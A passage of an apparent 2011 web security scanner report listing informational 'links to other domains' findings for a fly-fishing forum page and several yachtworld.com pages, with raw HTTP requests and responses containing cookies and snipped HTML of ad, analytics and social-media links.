http://www.facebook.com/plugins/likebox.php?id=45320162279&width=160&connections=10&stream=false&header=true&height=400
http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911
http://www.google-analytics.com/urchin.js
http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se
http://www.slamdancecharters.com/
http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se
http://www.widgetbox.com/
http://www.widgetbox.com/widget/reel_time-twitter

Request

GET /forum/showthread.php?t=41911 HTTP/1.1
Host: www.reel-time.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:49:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9
X-Powered-By: PHP/4.4.9
Set-Cookie: bblastvisit=1296157794; expires=Fri, 27 Jan 2012 19:49:54 GMT; path=/; domain=.reel-time.com
Set-Cookie: bblastactivity=0; expires=Fri, 27 Jan 2012 19:49:54 GMT; path=/; domain=.reel-time.com
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 135150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<![endif]-->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<noscript><a href="http://adserver.adtechus.com/adlink/3.0/5215/943914/0/225/ADTECH;loc=300" target="_blank"><img src="http://adserver.adtechus.com/adserv/3.0/5215.1/943914/0/225/ADTECH;loc=300" border="0" width="728" height="90"></a>
...[SNIP]...
<noscript><a href="http://adserver.adtechus.com/adlink/3.0/5215/895648/0/154/ADTECH;loc=300" target="_blank"><img src="http://adserver.adtechus.com/adserv/3.0/5215.1/895648/0/154/ADTECH;loc=300" border="0" width="160" height="600"></a>
...[SNIP]...
<h3><a href="http://www.facebook.com/pages/Reel-Timecom-The-Internet-Journal-of-Saltwater-Fly-Fishing/45320162279" target="_blank">Facebook Page</a>
...[SNIP]...
<h3><a href="http://www.facebook.com/group.php?gid=119446520260" target="_blank">Facebook Group</a>
...[SNIP]...
<h3><a href="http://twitter.com/reel_time" target="_blank">Reel_time on Twitter</a></h3>

<iframe src="http://www.facebook.com/plugins/likebox.php?id=45320162279&width=160&connections=10&stream=false&header=true&height=400" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:160px; height:400px;" allowTransparency="true"></iframe>
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...
<noscript>Get the <a href="http://www.widgetbox.com/widget/reel_time-twitter">Reel_Time Twitter</a> widget and many other <a href="http://www.widgetbox.com/">great free widgets</a> at <a href="http://www.widgetbox.com">Widgetbox</a>
...[SNIP]...
<br />
<a href="http://www.slamdancecharters.com" target="_blank">http://www.slamdancecharters.com</a>
...[SNIP]...
<br />
<a href="http://flatasscalm.blogspot.com" target="_blank">http://flatasscalm.blogspot.com</a>
...[SNIP]...
<td class="vbmenu_option"><a href="http://www.slamdancecharters.com">Visit Slamdance's homepage!</a>
...[SNIP]...
<td class="vbmenu_option"><a href="http://tomsheehy.home.comcast.net">Visit tsheehy's homepage!</a>
...[SNIP]...
<td class="vbmenu_option"><a href="http://www.4njhomes.com">Visit pcogs's homepage!</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se" target="socialbookmark"><img src="enlighten/misc/bookmarksite_digg.gif" border="0" alt="Submit Thread to Digg" class="inlineimg" /></a>

   <a href="http://digg.com/submit?phrase=2&url=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se" target="socialbookmark" style="text-decoration:none">Digg</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911" target="socialbookmark"><img src="enlighten/misc/facebook-16.jpg" border="0" alt="Submit Thread to Facebook" class="inlineimg" /></a>

   <a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911" target="socialbookmark" style="text-decoration:none">Facebook</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://del.icio.us/post?url=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se" target="socialbookmark"><img src="enlighten/misc/bookmarksite_delicious.gif" border="0" alt="Submit Thread to del.icio.us" class="inlineimg" /></a>

   <a href="http://del.icio.us/post?url=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se" target="socialbookmark" style="text-decoration:none">del.icio.us</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se" target="socialbookmark"><img src="enlighten/misc/bookmarksite_stumbleupon.gif" border="0" alt="Submit Thread to StumbleUpon" class="inlineimg" /></a>

   <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se" target="socialbookmark" style="text-decoration:none">StumbleUpon</a>
...[SNIP]...
<li class="smallfont" style="width:25%; min-width:160px; float:left; margin-top:6px">

       <a href="http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se" target="socialbookmark"><img src="enlighten/misc/bookmarksite_google.gif" border="0" alt="Submit Thread to Google" class="inlineimg" /></a>

   <a href="http://www.google.com/bookmarks/mark?op=edit&output=popup&bkmk=http%3A%2F%2Fwww.reel-time.com%2Fforum%2Fshowthread.php%3Ft%3D41911&title=99+Regulator+21+Vs.+05+Parker+21se" target="socialbookmark" style="text-decoration:none">Google</a>
...[SNIP]...
<noscript><a href="http://adserver.adtechus.com/adlink/3.0/5215/895649/0/225/ADTECH;loc=300" target="_blank"><img src="http://adserver.adtechus.com/adserv/3.0/5215.1/895649/0/225/ADTECH;loc=300" border="0" width="728" height="90"></a>
...[SNIP]...
</em> <a href="http://www.extremepixels.com/" target="_blank"><strong>
...[SNIP]...
<div align='center'>
<a href="http://namemedia.com/enthusiasts/outdoor-sports-sites/" target='_blank'><img src='http://reel-time.com/wp-content/themes/PRiNZ_BranfordMagazine_latest/branfordmagazine/images/namemedia_outdoorsports_Logo_2.jpg' border='0' />
...[SNIP]...
<NOSCRIPT>
<IMG SRC="http://bp.specificclick.net?pixid=21009300" width=0 height=0 border=0>
</NOSCRIPT>
...[SNIP]...
</script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>

<noscript>

<img src="http://pixel.quantserve.com/pixel/p-c5El8QwYYkAh-.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>

</noscript>



<script src="http://cdn.media6degrees.com/static/nm1134.js" type="text/javascript"></script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=C09814"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://e.nexac.com/e/a-1104/s-1985.js"></script>

<noscript><iframe src="http://f.nexac.com/e/a-1104/s-1985.xgi" name="naframe2" height="0" width="0" frameborder="0" ></iframe>
...[SNIP]...

12.41. http://www.yachtworld.com/core/globalnav/emailForm.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/globalnav/emailForm.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/globalnav/emailForm.jsp?send_to=tech&refer_page=/core/globalnav/contactUs.jsp

The response contains the following links to other domains:

http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US
http://www.yachtworld.de/
http://www.yachtworld.dk/
http://www.yachtworld.es/
http://www.yachtworld.fi/
http://www.yachtworld.fr/
http://www.yachtworldcharters.com/

Request

GET /core/globalnav/emailForm.jsp?send_to=tech&refer_page=/core/globalnav/contactUs.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:45 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<li><a href="http://www.yachtworld.dk"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_dk.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.de"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_de.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.es"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_es.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fr"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fr.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fi"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fi.gif" alt="" border="0"/>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS')" href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS:Search')" href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a onclick="menuClick(this,'ServicesUS:Transport')" href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US"><span>
...[SNIP]...

12.42. http://www.yachtworld.com/core/help/searchHelp.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/help/searchHelp.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/help/searchHelp.jsp?ybw=

The response contains the following links to other domains:

http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US
http://www.yachtworld.de/
http://www.yachtworld.dk/
http://www.yachtworld.es/
http://www.yachtworld.fi/
http://www.yachtworld.fr/
http://www.yachtworldcharters.com/

Request

GET /core/help/searchHelp.jsp?ybw= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:02 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<li><a href="http://www.yachtworld.dk"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_dk.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.de"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_de.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.es"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_es.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fr"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fr.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.fi"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_fi.gif" alt="" border="0"/>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS')" href="http://www.yachtworldcharters.com/" target="_blank">CHARTERS<!--[if IE 7]>
...[SNIP]...
<li><a onclick="menuClick(this,'ChartersUS:Search')" href="http://www.yachtworldcharters.com/" target="_blank"><span>
...[SNIP]...
<li><a onclick="menuClick(this,'ServicesUS:Transport')" href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US"><span>
...[SNIP]...

12.43. http://www.yachtworld.com/core/listing/advancedSearch.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range

The response contains the following links to other domains:

http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=US
http://www.yachtworld.de/
http://www.yachtworld.dk/
http://www.yachtworld.es/
http://www.yachtworld.fi/
http://www.yachtworld.fr/
http://www.yachtworldcharters.com/

Request

GET /core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2CUsed%2C2004; latestSavedSearches=0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.20.10.1296155952; s_pers=%20s_nr%3D1296156212531%7C1298748212531%3B%20s_lv%3D1296156212533%7C1390764212533%3B%20s_lv_s%3DFirst%2520Visit%7C1296158012533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/advancedSearch.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromYear%2525253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:23:10 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 54845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...
<li><a href="http://www.yachtworld.dk"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_dk.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.de"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_de.gif" alt="" border="0"/>
...[SNIP]...
<li><a href="http://www.yachtworld.es"><img title="Translation not supported" src="http://newimages.yachtworld.com/images/flags/flag_small_es.gif" alt="" border="0"/>
...[SNIP]...
